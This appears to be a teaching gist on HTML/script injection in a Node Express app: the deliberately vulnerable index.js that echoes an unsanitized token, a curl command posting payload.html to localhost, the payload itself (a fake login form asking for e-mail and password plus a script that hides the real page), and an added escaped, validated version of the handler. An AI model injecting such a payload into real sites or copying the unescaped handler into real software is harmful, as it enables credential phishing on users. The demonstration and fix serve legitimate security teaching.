@chrisparnin
Last active October 7, 2018 17:27
Example injection attack

Vulnerability

The application allows for unsanitized data from a user to be displayed on the page.

app.get('/', function (req, res) 
{
    res.send('<div id="share"><h1>Share a token with a friend!</h1><p>Alice shared:</p></div>' + token);
});

Exploit

Even a small opening can allow for a large injection onto your site.

# Load the html/css/js
PAYLOAD=$(cat payload.html)
# Send to service
curl localhost:3000/ -d "token=${PAYLOAD}"

The attack will even hide the old site content:

  <script>
    var element = document.getElementById('share');
    element.style = "visibility: hidden;"
  </script> 
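A hardened version of the handler, added here as an example and not part of the gist: the token is HTML-escaped on output and checked against an allowlist pattern on input (the token format is an assumption; the gist never states one). The helpers run without Express, and attachRoutes() shows how they would plug into the app from index.js.

```javascript
// Encode on output: escape the characters that let text break out of a text node or attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#39;',
  })[ch]);
}

// Validate on input. Assumed token format for this example: 8-64 URL-safe base64 characters.
const TOKEN_PATTERN = /^[A-Za-z0-9_-]{8,64}$/;

function isValidToken(candidate) {
  return typeof candidate === 'string' && TOKEN_PATTERN.test(candidate);
}

// Safe counterpart of the gist's res.send(...): same page, but the token is escaped,
// so the contents of payload.html render as literal text instead of markup.
function renderSharePage(token) {
  return '<div id="share"><h1>Share a token with a friend!</h1>' +
    '<p>Alice shared:</p></div>' +
    '<pre>' + escapeHtml(token) + '</pre>';
}

// Hardened versions of the two routes from index.js; pass the Express app from the gist.
function attachRoutes(app) {
  let token = '';
  app.get('/', (req, res) => {
    res.type('html').send(renderSharePage(token));
  });
  app.post('/', (req, res) => {
    const candidate = req.body && req.body.token;
    if (!isValidToken(candidate)) {
      return res.status(400).send('invalid token\n');
    }
    token = candidate;
    res.send('ok\n');
  });
}

// Stand-alone demo: the hidden-div script from the exploit section comes back as harmless text.
const demoPage = renderSharePage('<script>document.getElementById("share").style = "visibility: hidden;"</script>');
console.log(demoPage);
```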

Before: (screenshot)

After: (screenshot)

index.js

const express = require('express')
const bodyParser = require('body-parser')
const app = express()
const port = 3000
let token = '';

// parse application/x-www-form-urlencoded
app.use(bodyParser.urlencoded({ extended: false }))
// parse application/json
// app.use(bodyParser.json())

app.get('/', function (req, res)
{
    res.send('<div id="share"><h1>Share a token with a friend!</h1><p>Alice shared:</p></div>' + token);
});

app.post('/', function (req, res)
{
    console.log(req.body);
    token = req.body.token;
    res.send('ok\n');
});

app.listen(port, () => console.log(`Example app listening on port ${port}!`))
package.json

{
  "name": "insecure_node",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1"
  },
  "author": "",
  "license": "ISC",
  "dependencies": {
    "body-parser": "^1.18.3",
    "express": "^4.16.3"
  }
}
payload.html

<div>
<style scoped>
@import url("https://fonts.googleapis.com/css?family=Raleway:400,400i,700");
* {
margin: 0;
padding: 0;
box-sizing: border-box;
}
html, body {
width: 100%;
height: 100%;
}
body {
background: #614385; /* fallback for old browsers */
background: -webkit-linear-gradient(to right, #516395, #614385); /* Chrome 10-25, Safari 5.1-6 */
background: linear-gradient(to right, #516395, #614385); /* W3C, IE 10+/ Edge, Firefox 16+, Chrome 26+, Opera 12+, Safari 7+ */
font-family: 'Raleway', sans-serif;
letter-spacing: 0.1em;
}
.container {
width: 400px;
height: 400px;
background: #EDEDED;
position: absolute;
margin: auto;
top: 0;
bottom: 0;
left: 0;
right: 0;
border-radius: 10px;
border-bottom: 1px solid rgba(255, 255, 255, 0.3);
box-shadow: 2px 2px 20px rgba(0, 0, 0, 0.3);
}
.content-container {
width: 95%;
height: 100%;
position: relative;
margin: auto;
display: flex;
flex-direction: column;
justify-content: center;
}
label {
color: #E74C3C;
text-transform: uppercase;
}
input {
width: 100%;
height: 30px;
margin-bottom: 20px;
background: none;
color: #E74C3C;
border: none;
border-bottom: 1px solid #E74C3C;
opacity: 0.5;
transition: opacity 0.3s;
}
input:hover {
opacity: 1;
}
input:focus {
outline: none;
}
.frg-password {
text-decoration: none;
color: #E74C3C;
}
.frg-password:hover {
color: black;
}
.frg-password:visited {
color: #E74C3C;
}
.login {
width: 100%;
height: 30px;
border: none;
margin-bottom: 20px;
border-radius: 25px;
font-family: 'Raleway', sans-serif;
letter-spacing: 0.2em;
color: #E74C3C;
transition: background 1s, color 1s;
}
.login:hover {
background: #E74C3C;
color: #ECF0F1;
cursor: pointer;
}
.media {
width: 100%;
height: 30px;
border: none;
margin: 5px 0;
border-radius: 25px;
opacity: 0.8;
transition: opacity 0.3s;
}
.media:hover {
opacity: 1;
cursor: pointer;
}
.fb {
background: #3A5A98;
color: white;
}
.g {
background: #DC4437;
color: white;
}
button:focus {
outline: none;
}
</style>
<div class="container">
<div class="content-container">
<label for="email">E-mail</label><br>
<input id="email" type="text" placeholder="[email protected]" required>
<label for="password">Password</label><br>
<input id="password" type="password" placeholder="*****" pattern=".{3,10}" title="Password should be between 3 and 10 characters.">
<a class="frg-password" href="#">Forgot password ?</a><br>
<button class="login">LOGIN</button>
</div>
</div>
<script>
var element = document.getElementById('share');
element.style = "visibility: hidden;"
</script>
</div>